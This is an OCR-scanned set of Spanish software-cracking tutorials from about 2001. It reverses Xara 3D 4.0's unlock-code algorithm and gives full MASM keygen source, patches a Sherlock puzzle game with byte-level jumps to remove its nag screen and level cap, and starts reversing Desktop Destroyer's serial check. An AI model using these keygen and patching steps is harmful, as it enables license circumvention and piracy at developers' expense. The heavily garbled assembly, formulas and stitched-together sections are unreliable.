Se multiplica F344Eh por 24 y se le suma ESI (41h). El resultado es 16CE791h. 


:0041F7FA 0FBE742432 movsx esi, byte ptr [esp+32] ESI=42 
:0041F7FF 8D0440 lea eax, dword ptr [|eax+2*eax] 
:0041F802 8D04C6 lea eax, dword ptr [esi+8*eax] 


Se multiplica 16CE791h por 24 y se le suma ESI (42h). El resultado es 2235B5DAh. 


:0041F805 8D0440 lea eax, dword ptr [|eax+2*eax] 
:0041F808 8D84C267216BFB lea eax, dword ptr [edx+8*eax-0494DE99] 


Se multiplica 2235B5DAH por 24 y se le suma EDX (44h). Se le resta un número mágico y el resultado es 
30742E1Bh. 


:0041F80F 3BC1 cmp eax, ecx 
:0041F811 0F85B3000000 jne 0041F8CA 


Se comparan el número que habíamos visto antes (AA692764) con este de ahora y naturalmente, el programa nos 
manda a paseo. Pero ya sabemos lo que se hace con el código que hemos introducido. El numero a comparar, es el 
resultado de aplicar la fórmula: 


(105 +*24)4+7*)* 2443") * 24+6*)* 24+1*)* 24 4+2* ) * 24 + 4” - 494DE99h. Aquí, 1*, 2?, etc. significa el 
código ASCII de la 1*, 2* letra etc. 


Creo que la fórmula está clara, pero me temo que lo que sigue, no lo está tanto. 


Podemos empezar por buscar el número más bajo posible. ¿Cuál será? El número correspondiente al código 
"AAAAAAA”. Para ello, aplicaremos la fórmula pero nos detendremos antes de efectuar la última resta: 


(((C41h * 24) +41h)* 24+41h)* 24+41h)*24+41h ) * 24+ 41h ) * 24 + 41h y el resultado es: ¡¡494DE99!! 
Eso quiere decir que el numero correspondiente al código "AAAAAAA” es 0 y que para calcular los números de 
cualquier código es válida la fórmula: 


(05 *24)+7*)*24+3")* 244+6*)*244+1*)* 24 +2") * 24 + 4*. Ahora, 1”, 2”, etc. significa la diferencia 
entre el código ASCII de la 1?, 2* letra etc. y 41h. 


¡Ahora podemos deducir que el código de la 4* letra será el resto de dividir el número guardado en ECX, por 24. ¿Por 
qué? Si llamamos Nl a ((((((5** 24)+7*)*244+3")* 24+6*)*24+1*)* 24 +2* ) * 24, y N2 al número en 
ECX, podemos decir que: N1 + 4? = N2, entonces N1 = N2 - 4” . Sabemos que N1 es múltiplo de 24, por tanto, N2 - 


4” también lo es. Entonces lo que le "sobrará" a N2 para ser divisible por 24 es 4? o sea, la diferencia entre el código 
de la 4* letra y 41h. 


lA partir de ahora, todos los números van a ser hexadecimales y no voy a poner la "h". 


Vamos a probar dividiendo AA692764 por 18 (24 decimal). El resultado es 719B6F9 y el resto es C, que sumado a 
41, nos da 4D, el código de "M" que será la cuarta letra. 
lA continuación, dividimos 719B6F9 por 18. El resultado es 4BBCES y el resto es 1, que sumado a 41, nos da 42, el 
código de "B" que será la segunda letra. 
'A continuación, dividimos 4BBCES5 por 18. El resultado es 327DF y el resto es D, que sumado a 41, nos da 4E, el 
código de "N" que será la primera letra. 
¡A continuación, dividimos 327DF por 18. El resultado es 21A9 y el resto es 7, que sumado a 41, nos da 48, el código 
de "H” que será la sexta letra. 
¡A continuación, dividimos 21A9 por 18. El resultado es 167 y el resto es 1, que sumado a 41, nos da 42, el código de 
"B" que será la tercera letra. 

inalmente, dividimos 167 por 18. El resultado es E y el resto es 17, que sumado a 41, nos da 58, el código de "X" 
ES será la séptima letra. 
Si dividiéramos E por 18, El resultado sería O y el resto E, que sumado a 41, nos da 4F, el código de "O" que será la 
caen letra. 

espués de todo este cipostio, utilizando la cuenta de la vieja, hemos descubierto el código para mi instalación ;0) 
que es: " NBBMOHX". Vosotros ya os arreglaréis con la vuestra :0D 


Si a estas alturas, queda alguien leyendo :0) le interesará saber de donde sale el número misterioso que habíamos 
visto antes en EBP (B466C9E8). Para ello, es necesario buscar el momento en que se pone este valor en el registro. 
No sé si hay un sistema mejor, lo que hice fue poner breakpoints cada vez más atrás, hasta que lo pillé :0) 


:0041EE65 8B54244C mov edx, dword ptr [esp+4C] 


Se pone en EDX un número extraño, pero que después de ver como va la cosa, se descubre que es el valor de 
FirstinstallDateTime en HKEY_LOCAL_MACHINE Software WMicrosof4 Windows WCurrentVersion. Por cierto, para 
Windows NT y 2000, la clave Windows será Windows NT, pero no existe FirstInstallDateTime, por lo tanto, este 
keygen sólo valdrá para Windows 9x y Me. De todos modos, creo que al que tenga NT ó 2000 no le costará mucho 
hacer que el keygen valga para todos los sistemas. 


:0041EE69 33C0 xor eax, eax 
:0041EE6B 8DAA5E40D991 lea ebp, dword ptr [edx+91D9405E] 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :0041EE90 (C) 


:0041EE71 8B8C0408020000 mov ecx, dword ptr [esp+eax+00000208] 


'Aquí se descubrió el pastel cuando reconocí los nombres de usuario y organización que hay en el registro. Se ponen 
en ECX las cuatro primeras letras de RegisteredOrganization. 


:0041EE78 8B9C0408030000 mov ebx, dword ptr [esp+eax+00000308] 


[Y aquí, en EBX las cuatro primeras de RegisteredOwner. 


:0041EE7F 03CD add ecx, ebp 
:0041EE81 83C004 add eax, 00000004 
:0041£EE84 C1C10D rol ecx, 0D 
:0041EE87 03CB add ecx, ebx 
:0041EE89 C1C104 rol ecx, 04 
:0041EE8C 3BC6 cmp eax, esi 
:0041EE8E 8BE9 mov ebp, ecx 
:0041EE90 7CDF j1 0041EE71 


Este proceso se repite 64 veces, al cabo de las cuales tenemos en EBP el valor B466C9E8. 
Bueno, ya sabemos como se genera el código. Ahora trataremos de generarlo nosotros :0) 


PROGRAMACION DELKEYGEN 


Tal como he dicho anteriormente, voy a procurar explicar el proceso del keygen con detalle. De todos modos, sólo 
voy a hacerlo con lo relativo a este programa concreto. Las explicaciones sobre cuestiones generales, las podéis 
encontrar en: "Como Craquear con Ensamblador para Win32" de Mr. Crimson. (Creo haberlo obtenido en 
http://www .multimania.com/mrcrimson/private/MrCrimson1.zip)Y es que yo podría repetir sus explicaciones, pero 


siempre es mejor beber de las fuentes originales :0) Además, vale la pena leerlo o, para ser más exactos, me parece de 
lectura obligada. En primer lugar, el archivo de recursos rsrc.rc: 


ftinclude "Amasm32lincludelresource.h" 


define IDD_DIALOG 1000 
Hkdefine IDC_SERIAL 1001 
Hkdefine IDC_GEN 1002 
Hkdefine IDC_EXIT 1003 
fdefine IDC_INFO 1004 
Hkdefine IDC_STATIC -1 


keygen ICON keygen.ico 

IDD_DIALOG DIALOG 100,100,109,50 

STYLE WS_CAPTION | DS_CENTER | WS_SYSMENU |WS_MINIMIZEBOX 
CAPTION "Xara 3D 4.0" 


FONT 10, "MS Sans Serif" 


BEGIN 
LTEXT "Código de desbloqueo", IDC_STATIC,8,5,36,18 
EDITTEXT IDC_SERIAL, 47,8,54,12,ES_READONLY ES_CENTER 
PUSHBUTTON "Generar", IDC_GEN,8,30,29,12 
PUSHBUTTON "Exit", IDC_EXIT,40,30,29,12 
PUSHBUTTON "Info", IDC_INFO,72,30,29,12 

END 


No hay mucho que contar: Una etiqueta de texto, una ventana de texto, y tres botones. De todo ello, indicamos las 
coordenadas y las medidas. 
¡Ahora pondremos el código en el archivo xara.asm: 


.386 
.model flat,stdcall 
option casemap:none 


include c:imasm32lincludeYwindows.inc 
include c:imasm32Xincludeluser32.inc 

include c:imasm32lincludeladvapi32.inc 
include c:imasm32lincludelkernel32.inc 


includelib c:imasm321libluser32.lib 
includelib c:imasm3211libladvapi32.lib 
includelib c:imasm321l1iblkernel32.lib 


Las librerías que incluimos. Por ejemplo advapi32 incluye las definiciones de las APIs que utilizamos aquí, relativas 
al registro. 


. const 

IDD_DIALOG EQU 1000 
IDC_SERIAL EQU 1001 
IDC_GEN EQU 1002 
IDC_EXIT EQU 1003 
IDC_INFO EQU 1004 


D1lgFunc PROTO :DWORD, :DWORD, :DWORD, : DWORD 
Operacion PROTO 


. data 

Icono db "keygen",0 

Iconimage db "keygen",0 

error db "¡Fallo en registro!",0 

txtl db "1% —- Este keygen sólo es válido para Windows 9x y Me 
a ES MOS A ON 


"2% — Los datos para generar el código de desbloqueo, se 
toman ",X 

"del registro. Si se instala de nuevo Windows, o se cambia 
algún ",M 

"dato de los que emplea el programa, se deberá obtener un 
nuevo ",X 

"número de registro, como ya se encargará de indicarnos el 
Xara 3D.",13,10,13,10,1 

"Saludos de CaoS ReptantE :0)",0 


txt2 db "Información de interés",0 
hInstance dd 0 

hIcon dd 0 

hWnd dd 0 

largo do 2 dup(0),0 

codigo do 7 dup (0),0 

owner db 256 dup (0),0 

ownertxt db "RegisteredOwner",0 

organ db 256 dup (0),0 

organtxt db "RegisteredOrganization",0 
fidt db 4 dup (0),0 

fidttxt db "FirstIinstallDateTime",0 
clave db "SoftwarelMicrosoftYWWindowsYCurrentVersion",0 
handle dd ? 


longitud db 2 dup(0),0 


Las variables que vamos a utilizar. En handle, ponemos interrogante porque es un valor que el programa va a sacar 
del registro y desconocemos su longitud. 


. code 


start: 


invoke GetModuleHandle,NULL 

mov hInstance,eax 

invoke DialogBoxParam,hInstance, IDD_DIALOG, NULL, ADDR 
D1lgFunc, NULL 

invoke ExitProcess,NULL 


Dl1lgFunc proc hDl1g:DWORD, uMsg: DWORD, wParam:DWORD, 1lParam:DWORD 
.1f uMsg==WM_INITDIALOG 
mov eax,hDlg 
mov hWnd, eax 
invoke LoadIcon,hInstance,ADDR Icono 
mov hIcon,eax 
invoke SendMessage, hDlg, WM_SETICON, 1,hIcon 


Creación de la ventana. 


.elseif uMsg==WM_CLOSE 
invoke EndDialog,hDlg,NULL 


¿Cerramos desde el botoncito en el lado superior derecho de la ventana? 


.elseif uMsg==WM_COMMAND 
mov eax,wParam 
mov edx,eax 
shr edx,16 


¿Le hemos dado a un botón? Vamos a ver a cual. 


.1f dx==BN_CLICKED 

.1f ax==IDC_EXIT 

invoke SendMessage,hDlg,WM_CLOSE,0,0 

.elseif ax==IDC_INFO 

invoke MessageBox,hDl1g,ADDR txt1,ADDR 
txt2,MB_ICONINFORMATION 
.elseif ax==IDC_GEN 
invoke Operacion 
.«1f eax==ERROR_SUCCESS 

invoke SetD1gltemText,hDlg,IDC_SERIAL,ADDR codigo 
.elseif 

invoke SetD1gltemText,hDlg, IDC_SERIAL,ADDR error 
.endif 
ret 


Si le hemos dado al de salir, pues a la calle. Si le hemos dado al de Info, nos aparece la Message Box con el texto que 
hemos definido. Si le hemos dado al de generar, llama a Operacion y al regreso si ha habido un error nos lo indica, y 
si todo ha ido bien, nos coloca el código obtenido en la ventana de texto. 


.endif 
.endif 
.endif 
ret 


Dl1lgFunc endp 


¡Aquí se va a calcular el código: 


Operacion proc 


invoke RegOpenKeyExA, HKEY_LOCAL MACHINE,ADDR clave,NULL, 
KEY_QUERY_VALUE,ADDR handle 
.1f eax!=ERROR_SUCCESS 
ret 
.endif 


Obtenemos el handle o identificador de la clave HKLM (Fijaos que es la variable en la que hemos puesto 
interrogante). Si no lo encuentra (mal asunto), error y a la calle. El valor NULL es obligado. La constante 
KKEY_QUERY_VALUE es la máscara de acceso a la clave, que indica lo que nos permite hacer con ella. Para lo que 
queremos, esta nos vale. 


mov ebx, Offset longitud 
mov [ebx], word ptr 256 
invoke RegQueryValueExA, handle, ADDR ownertxt, NULL, REG_NONE, ADDR 
owner,ADDR longitud 
.1f eax!=ERROR_SUCCESS 
ret 
.endif 


¡A quí, con el handle obtenido antes, obtiene el valor de RegisteredOwner. En longitud, le indicamos la longitud de los 
datos a leer, pero nos devuelve el número de bytes leídos realmente (hasta encontrar 0). Por esta razón, debemos 
volver a poner en longitud los 256 bytes. Si aquí nos da error, es posible que tengamos instalado Windows NT o 
2000 (no se me ocurre otra razón). 


mov ebx, Offset longitud 
mov [ebx], word ptr 256 
invoke RegQueryValueExA, handle, ADDR organtxt,NULL,REG_NONE, ADDR 
organ,ADDR longitud 
.1f eax!=ERROR_SUCCESS 
ret 
.endif 


Lo mismo, pero para RegisteredOrganization. 


mov ebx, Offset longitud 
mov [ebx], word ptr 4 
invoke RegQueryValueExA, handle,ADDR fidttxt,NULL,REG_NONE, ADDR 
fidt,ADDR longitud 
.1f eax!=ERROR_SUCCESS 
ret 
.endif 


Lo mismo, pero para FirstInstallDateTime. 


invoke RegCloseKey, HKEY_LOCAL_ MACHINE 


mov esi, 100h 
pushad 


Tuve problemas porque el programa se colgaba. Después de utilizar el Softlce como debugger :0) pensé que sería una 
buena idea guardar todos los registros para recuperarlos después. Se terminaron los problemas. 


El código que sigue, es equivalente al del programa entre las direcciones 41EE65 y 41EE90. 


mov edx, Offset fidt 

mov edx, dword ptr [edx] 

xor eax, eax 

lea ebp, dword ptr [edx+91D9405Eh] 
buclel: mov ecx, Offset organ 

mov ecx, dword ptr [ecx+eax] 

mov ebx, Offset owner 

mov ebx, dword ptr [ebx+eax] 

add ecx, ebp 

add eax, 01 

rol ecx, 0ODh 

add ecx, ebx 

rol ecx, 04 

cmp eax, esi 

mov ebp, ecx 

31 buclel 


Este otro código, es equivalente al del programa entre las direcciones 41F787 y 41F7A2. 


mov eax, ebp 

mov ecx, ebp 

shr eax, 1 

and eax, >D5555555h 

aña. €E6X, 'DIODDDDDODNA 

lea ecx, dword ptr [eax+2*ecx] 
imul ecx, 5678DE15h 


¡Ahora sólo es cuestión de obtener las letras y ponerlas en el orden correcto. 


xor esi, esi 

mov edi, Offset codigo 
mov eaXxX, ecx 

mov ecx, 24 

for tabla, <3,1,0,5,2,06,4> 


Esta instrucción for, ejecuta las instrucciones que hay hasta endm tantas veces como parámetros (<p1,p2,...>) tenga, 
dándole a la variable tabla los valores de cada parámetro. O sea, como un bucle for-next, pero con los valores de la 
variable definibles. En este caso, los parámetros representan el número que hay que sumar a la dirección de inicio del 
código para situar las letras en el orden correcto (3 para la cuarta letra, 1 para la segunda, O para la primera, etc.) 


xor edx, edx 
div ecx 


Esta instrucción, divide el contenido de los registros EDX : EAX por ECX dejando el cociente en EAX y el resto en 
EDX. Previamente, hemos puesto a cero el registro EDX. 


add edx, 41h 
mov [edi+tabla], dl 


Le sumamos al resto, 41h para convertirlo en letra y lo ponemos en su lugar, definido por la variable tabla, o sea los 


parámetros de la instrucción for. Así, como he dicho antes, se colocará primero la cuarta letra, luego la segunda, la 
primera, la quinta, etc. 


endm 


popad 
ret 


Recuperamos los registros y volvemos. 


Operacion endp 
end start 


Ensamblamos con el MAsm32 y he aquí el resultado: 


MM Xara 3D 4.0 


Código de 
desbleques) NBBMOR 
Exit | Into | 


That's all Folks. 


FINAL 


¡Debo recordaros como siempre, que si pensáis utilizar regularmente el programa, debéis plantearos invertir una parte 
considerable de esos dineros que malgastáis tan alegremente en vicios -seguramente algunos de ellos inconfesables- en 
proporcionar una vejez tranquila y sin sobresaltos al programador ;0) 


Para finalizar, quiero mandar un saludo a Act Mago, buen amigo y excelente persona. También quiero saludar muy 
cordialmente a DeK_bad_boy_OIiN :0) Por último, debo expresar mi gratitud al Profesor_X por sus recopilaciones y a 
Karpoff por su página. Tal vez estamos acostumbrados a tomar de la Red lo que necesitamos, sin pensar en que esto sólo es 
posible gracias al esfuerzo desinteresado de personas como ellos. La verdad, si no fuera por estas personas, las cosas serían 
imás difíciles :0) 


Para consultas relativas a mis tutos, mi dirección de e-mail es: caos_reptante hotmail.com 
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Karpoff Spanish Tutor 2001 


Acceso a solo 100 niveles, de un total de 131071 etc. 
Nags-screen, limite de niveles 
http 20% 
Y Hex WorkShop 2.20b005 
Herramientas: P* Softl CE 4.0 
PF KW32dasm 8.93 


OS AENA HE ZETA 


INTRODUCCION 


ola, estoy con el gusto de poder mostrarles la forma de como lleve a cabo el analisis de esta aplicacion. 


Antes que nada dejenme comentarles que esta aplicacion, antes realizada para MSDOS, se tenia acceso a cualquier nivel, sin 
embargo en 'guidous', solo a 100 niveles; es bueno y entretenido, si saben a que me refiero y ademas estructuralmente esta muy 
bien realizado, como podran observar mas adelante, no es como algunas aplicaciones donde en tres renglones se decide la suerte 
:0O406AAE TEST AL, AL 

:00406ABO JNE 00406ACA 


ossible StringData Ref from Data Obj --> "Invalid Registration Information" 


:00406AB2 PUSH 0046088C 
:00406AB7 


ossible StringData Ref from Data Obj --> "Thank you for registering your copy of 'Aplicacion" 


:00406ACA PUSH 00460838 
:00406ACF 


y eso lo hace mas interesante 


AL ATAKE 


Primeramente vamos a observar su comportamiento, corremos la aplicacion y lo primero: un NAG 


Despues una ventana de dialogo, donde solicitan el nivel preferido, si indicamos un nivel entre O y 49 o 65536 y 65585 
todo va bien y a jugar 


Sin embargo, que pasa cuando damos un numero entre 50 y 65536 o mayor a 65585 ? 


Como respuesta tenemos frente a nosotros un aviso de la restriccion, y automaticamente te mandan a jugar al nivel 49 


Shtrfado: The Goma ol Loge Tim 
A 1 


ura e y data y Da rs cad. Yin [Vowoel Aja tir SOME lus? a 
ces de Ve De de a dl ds e e dl hd e a nl ci dr 
A 4 qu o tp tir BID + 1 A WUIWI Yo 2 be 6000 an thin m7 
so da o 
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mm ALS Western es pm 
Penn. (SI 140 5750 aso puedz Ú to 49 and 65536 te 65585. 


Wehes pos parobose he hoensed reinos ol 5hedock. pau 
milrecciro aer 131.000 parztes. exis ioge sets. and so 
segatabos meisders. Pleaze conceder peyisg der Sherlock 
tadas, and THANE VOL ver much ber plegng Sherdeckl 


Vamo dora coo cl Dido lr a td os cr. a hom 


Do lc pus cd cc o sd. cc o a 


Imagen 1 Imagen 2 Imagen 3 


Bien, ahora sabemos donde actuar, cargamos la aplicacion en el 'Loader32' del Softlce 


Lo primero que vamos a hacer, es quitarnos de encima el molesto Nag-Screen, y para ello vamos a utilizar las 
siguientes interrupciones en el Softlce 


bpx MessageBox 

bpx MessageBoxExA 
bpx DialogBoxParam 
bpx DialogBox 


Corremos la aplicacion e inmediatamente saltamos al Softlce 


USER!DIALOGBOX 


17C7:4CB6 MOV CX, 4E1B < ---- Aqui estamos 
17C7:4CB9 JMP 4CBE 
17C7:4CBB 


vamos a detenernos aqui un poco para hacer varias observaciones, ya que el proposito de este texto es, en esencia un 
tutorial, asi que veamos la "Ventana de Registros' 


EAX=00000084 EBX=0000BFD6 ECX=8126B1BC EDX=81624B48 ESI=0000198E 
EDI=00000001 EBP=0000BFCE ESP=0000BFB8 EIP=00004CB6 odIszaPc 
CSs=17C7 DS=198F SS=198F ES=188F FS=0000 GS=0000 


observa bien estos dos valores SS=198F y ESP=0000BFB8 estos valores combinados nos indican donde esta la Pila, y 
si quieres verla, teclea en la "Ventana de Comandos' del Softlce 


D 198F:0000BFB8 presionas Enter y obtenemos 


198F:0000BFB8 5B 35 BF 3D CO 31 BF 3D-00 00 84 00 00 00 8E 19 
198F:0000BFC8 D8 C4 01 00 00 00 FA BF-02 11 07 3B D6 BF 40 2A 


ahora veamos que en 198F:0000BFB8 hay 5B 35 BF 3D o sea la direccion 3DBF:0000355B, al parecer a esa direccion 
vamos a caer, le damos a 'F12' y nos manda al Nag, ahora le damos a 'Play Game' y regresamos al Softlce, justo en la 
direccion que habiamos supuesto 


3DBF:3540 JMP 355B 
3DBF:3542 MOV SI, [OCAA] 
3DBF:3546 PUSH SI 


3DBF:3547 PUSH WORD PTR [BX+1E] 

3DBF:354A PUSH WORD PTR [BX+1C] 

3DBF:354D PUSH WORD PTR [BP-02] 

3DBF:3550 PUSH 40FF 

3DBF:3553 PUSH 31C0 

3DBF:3556 CALL USER!'DIALOGBOX 

3DBF:355B MOV DL AX < ---- Estamos aqui 
3DBF:355D PUSH WORD PTR [BP+06] 


podemos suponer que la instruccuion causante del NAG-Screen es 
3DBF:3556 CALL USER'DIALOGBOX 

por lo tanto, pongamos un JMP en la direccion 3DBF:3542 SI, [OCAA] para omitir tambien los PUSH 
3DBF:3542 JMP 355B 

en el W32Dasm nos vamos a :3542 SI, [OCAA] y vemos en la barra de estado el Offset 0003C82h, 

despues en el Hex WorkShop nos vamos al Offset y tecleamos EB 17, salvamos, corremos la aplicacion, y --- 

EXCELENTE funciono --- pero podemos ir mas alla, preguntemonos que sucederia si estando en la direccion 
3DBF:355B MOV DL AX 

presionamos 'F12' otra vez, ya que para aprender hay que experimentar, y regresamos a 


366F:10E7 RETF 0002 
366F:10EA ENTER 0024, 00 
366F:10EE PUSH 00 


366F:10FO LEA AX, [BP-24] 
366F:10F3 PUSH AX 
366F:10F4 CALL 340F:1B28 
366F:10F9 LEA AX, [BP-24] 


366F:10FC PUSH AX 
366F:10FD CALL 37FF:350E 


366F:1102 LEA AX, [BP-24] < ---- Aqui estamos 
366F:1105 PUSH AX 

366F:1106 CALL 37FF:33B2 

366F:110B LEAVE 


366F:110C RETF 


intentemos poner un JMP hacia la direccion 1102 en la direccion 366F:10F9 

366F:10F9 JMP 1102 
pero ... NO, no ganamos nada haciendo esto, intentemos mejor eliminar por completo las tres subrutinas y probemos la 
aplicacion, por si se queda congelada o nos manda algun error (en tal mejor modificariamos 3DBF:3542 SI, [OCAA] 
por 3DBF:3542 JMP 3553B y nos dejamos de tonterias),  366F:10EE JMP 110B 
en el W32Dasm nos vamos hasta :10EE PUSH 00 y vemos en la barra de estado el Offset 0001492Eh, en el Hex 
WorkShop nos vamos al Offset y tecleamos EB 1B, salvamos, corremos la aplicacion, y ... 

... funciono tambien 


No hay que ser tan ambiciosos, pero, sino lo intentamos nunca sabremos que tipo de errores se pueden generar, asi que 
estando en la direccion 

366F:1102 LEA AX,[BP-24] 
presionamos 'F12" otra vez, ya que somos necios, y regresamos al Softice 


3C77:27D0 JMP 2873 

3C77:27D3 PUSH DS 

3C77:274D PUSH 01A6 

3C77:277D CALL GDI!CREATEPALETTE 

3C77:27DC PUSH AX 

3C77:27DD PUSH 25F8 

3C77:27E0 CALL 3BCF:DB72 

3C77:27E5 CALL 366F:10EA 

3C77:27EA CMP WORD PTR [3056], 01 < ---- Aqui estamos 
3C77:27EF JNZ 2803 


intentemos ahora poner un JMP hacia la direccion 27EA en la direccion 3C77:27D3 
3C77:27D3 JMP 27EA 
y aunque parece criminal, esta aplicacion funciona 


Bueno, nuestra intencion inicial era desaparecer el NAG-Screen y es suficiente para ello, con llevar a cabo el paso 
anterior, no vaya a ser que en realidad estemos eliminando una rutina importante, que a simple vista no resalta. Punto y 
aparte 


Una vez concluido el primer paso, vamos a lo realmente interesante, miles de niveles nos estan esperando, y no va a ser 
facil cazarlos, para ello primero vamos a quitar el texto siguiente (Puzzles 65536 though 131071 have no " given" 
locations on the playing board.) ya que confiamos que no va a ser necesario, en el Offset 0004047E y hasta el 
000404CB sustituimos por espacios ( 20h en el Hex WorkShop) o por la leyenda que se te ocurra poner "Alguna vez, 
has bailado con el Diablo, bajo tenue luz de la Luna?. Fantomas" 


Ahora si, corremos la aplicacion una vez cargada en el Loader32 (recordemos que aun tenemos nuestras interrupciones 
cargadas, te sugiero que las inhabilites ( en el Softice con 'BD *' ) para llegar rapidamente al cuadro de dialogo ( ver 
imagen2 ), 


(00) * bpx MessageBox 
(01) * bpx Message BoxExA 
(02) * bpx DialogBoxParam 
(03) * bpx DialogBox 


una vez que lleguemos, vamos habilitar nuestras interrupciones ( en el Softice con 'BE *' ) y vamos a tratar de generar 
un error en la aplicacion, solicitando el Puzzle ++ 50, para que nos mande el cuadro de dialogo ( ver imagen 3 ) 


seleccionamos 'OK' y regresamos al Softice 


USER!DIALOGBOX 


17C7:4CB6 MOV CX, 4E1B < ---- Aqui estamos 
17C7:4CB9 JMP 4CBE 
17C7:4CBB 


aqui empieza a preparar el cuadro de dialogo que nos va a mostrar, por lo tanto apretamos 'F12' para que nos mande a la 
instruccion que la ordeno 


3D3F:3540 JMP 355B 

3D3F:3542 MOV SI, [OCAA] 
3D3F:3546 PUSH SI 

3D3F:3547 PUSH WORD PTR [BX+1E] 
3D3F:354A PUSH WORD PTR [BX+1C] 
3D3F:354D PUSH WORD PTR [BX-02] 
3D3F:3550 PUSH 3D3F 

3D3F:3553 PUSH 31C0 

3D3F:3556 CALL USER!'DIALOGBOX 
3D3F:355B MOV DL AX < ---- Aqui estamos 
3D3F:355D PUSH WORD PTR [BP+06] 


podriamos actuar precipitadamente y sustituir rapidamente 

3D3F:3542 MOV SI, [OCAA] por 3D3F:3542 JMP 355B 
pero esto unicamente nos evitaria ver el mensage de restriccion, y de todas maneras no nos permitiria pasar del nivel 
49, asi que tenemos que encontrar donde se lleva a cabo esta restriccion, para ello apretamos 'F12' y nos manda a 


325F:068A CALL 325F:241C 
325F:068F MOV BX, [3064] 
325F:0693 MOV AX, [BX,+12] 
325F:0696 MOV [305A], AX 


325F:0699 MOV AX, [BP-40] 
325F:069C MOV [300A], AX 


325F:069F MOV [BX+0C], AX 
325F:06A2 CMP WORD PTR [3004], 31 
325F:06A7 JBE 06D3 

325F:06A9 PUSH 00 

325F:06AB LEA AX, [BP-30] 


325F:06AE PUSH AX 
325F:06AF CALL 429F:2604 


325F:06B4 LEA AX, [BP-30] 

325F:06B7 PUSH AX 

325F:06B8 CALL 3D3F:350E 

325F:06BD MOV AX, 0031 < ---- Aqui estamos 
325F:06C0 MOV [300A], AX 

325F:06C3 MOV BX, [3064] 

325F:06C7 


ahora si, aqui podemos ver la rutina de restriccion, en la direccion 

325F:06A2 CMP WORD PTR [300A], 31 
compara nuestro numero elegido 32h ( 50 decimal ) y sis es mayor a 31h, no salta a 325F:06D3, nos manda el mensaje, 
y sustituye nuestra seleccion por 31h ( 49 en decimal ) y ya perdimos, asi entonces si queremos ganar basta con 
cambiar 325F:06A7 JBE 06D3 por 325F:06A7 JMP 06D3, nuevamente con el W32Dasm obtenemos el Offset 
00013EE7h, y en el Hex WorkShop nos vamos al Offset y tecleamos EB 2A, salvamos, corremos la aplicacion, y ... 
Asunto arreglado 


*La amenaza elegante* 


El presente documento, es una tarea cientifica de investigacion, con caracter docente, no pretende violar ninguna ley 
vigente, el autor no se hace responsable del uso, manejo o practicas inadecuadas del analisis presentado (:0) 


Programa: 


Karpoff Spanish Tutor 
Desktop Destroyer 2.0 


PROTECCION: Name / Serial. 

Objetivo: Hacer un Keygen. 

Descripcion: Salvapantallas que Juega con la imagen del escritorio. 

Dificultad: Aficionado. 

DOWNLOAD: http://www.janz-kiel.de/isotope244/DesktopDestroyer.zip 

Herramientas: Softice, Masm. 

CRACKER: CaoS ReptantE FECHA: 21/07/2001 
INTRODUCCION 


A la hora de proteger un programa mediante un serial number dependiente del nombre o también de la 
dirección de e-mail -cómo en este programa-, hay varias maneras de comprobar que el número que 
introducimos es correcto. La más sencilla es la de comparar el número introducido con un número 
generado por el programa a partir del nombre. En este caso, basta con buscar mediante la instrucción s 
30:00 1 f£ffffff 'serial_chungo' la posición o posiciones que ocupa en la memoria el número introducido. A 
continuación, empleando las instrucciones bpm dirección_obtenida r o bpr inicio_dirección_obtenida 
final_dirección obtenida r sabremos cuando el programa lee este número para compararlo con el 
correcto. Hay otro tipo de comparación -que sólo he visto una vez- en la que el programa comparaba tres 
caracteres generados a partir del serial chungo, con las tres primeras letras del nombre. No tiene mayor 
dificultad que el anterior si aceptamos que el nombre con el que nos registramos empiece por ejemplo por 
"H+9" o algo parecido. De lo contrario tendremos que investigar como se generan estos caracteres para 
introducir un número que haga que coincidan con el inicio de nuestro nombre. Hay otro sistema mixto, que 
convierte el nombre en un número y el serial chungo en otro número, comparando después ambos 
números. Este sistema, lógicamente es más complicado que los anteriores, sobre todo a la hora de hacer un 
keygen. De todos modos, estos tres sistemas tienen una característica común: el éxito o el fracaso se 
deciden en una sola comparación, lo que facilita sobre todo el parcheado del programa. Hay otra 
posibilidad, que desde mi punto de vista es la mejor, y que consiste en establecer una serie de "pruebas" 
que el número debe pasar para ser aceptado, con todas las posibles variantes que se le puedan ocurrir al 
programador. Esto obliga a seguir todo el proceso y dificulta también el parcheado. En este caso, la pereza, 
la desidia, el bajo precio del programa o el fatalismo "si igual lo van a crackear..." han hecho elegir la 
solución más sencilla. Esto ha sido una suerte a la hora de hacer el keygen, porque el proceso de 


generación del número correcto se repite y se embarulla para tratar de enmascararlo, por lo que resulta más 
sencillo trabajar hacia atrás, es decir empezar por la comparación e ir desandando el camino hasta descubrir 
el proceso. Vamos a verlo. 


AL ATAKE 


En primer lugar, después de haber cargado el Softlce, haber introducido unos datos cualesquiera, y establecido el 
breakpoint de siempre :0) bpx hmemcpy, tratamos de registrar el programa. Salta el Slce y después de darle dos 
veces a FS y 9 veces a F12 para volver al programa, aparecemos en: 


:00405DBE 8D4C242C lea ecx, dword ptr [esp+2C] 


Ahora buscaremos la situación del serial chungo siguiendo el procedimiento descrito anteriormente. Podemos ver 
que el número se sitúa en dos posiciones de memoria, aunque sólo nos interesa la primera. Si ahora utilizamos la 
instrucción bpm, el Slce nos avisará cuando se lea la primera cifra del número, lo que normalmente es suficiente 
para saber por donde va la cosa, pero en este caso tendremos que emplear la instrucción bpr, que nos indicará la 
lectura de cualquiera de las cifras que forman el número (ya veremos por qué...). FS para continuar y llegamos a: 


:00408C00 F2 repnz 

:00408C01 AE scasb 

:00408C02 F7D1 not ecx 

:00408C04 49 dec ecx 

:00408C05 83F912 cmp ecx, 00000012 


Aquí se compara la longitud de nuestro serial con 12h, y nos manda a paseo si no es igual. Así pues, nuestro número 
deberá tener 18 cifras. FS de nuevo y aparecemos en: 


:004098F1 8A46FF mov al, byte ptr [esi-01] 
:004098F4 33C9 xXOr ecx, ecx 
:004098F6 3A47FF cmp al, byte ptr [edi-01] 


Aquí se efectúa la comparación entre nuestro serial chungo situado en ESI con el número válido que aparece en EDI, 
pero ¡oh sorpresa! se empieza a comparar por la novena cifra. 


:004098F9 7704 ja 004098FF 
:004098FB 7404 je 00409901 


Si las cifras de ambos números coinciden, salta y continua la comprobación. En caso contrario nos echará a los 
marrajos :o0( Así se hace la comparación entre las ocho cifras que van de la novena a la decimosexta, las otras no he 
averiguado como se generan pero no tienen ninguna trascendencia. A partir de aquí, empieza la marcha atrás. En mi 
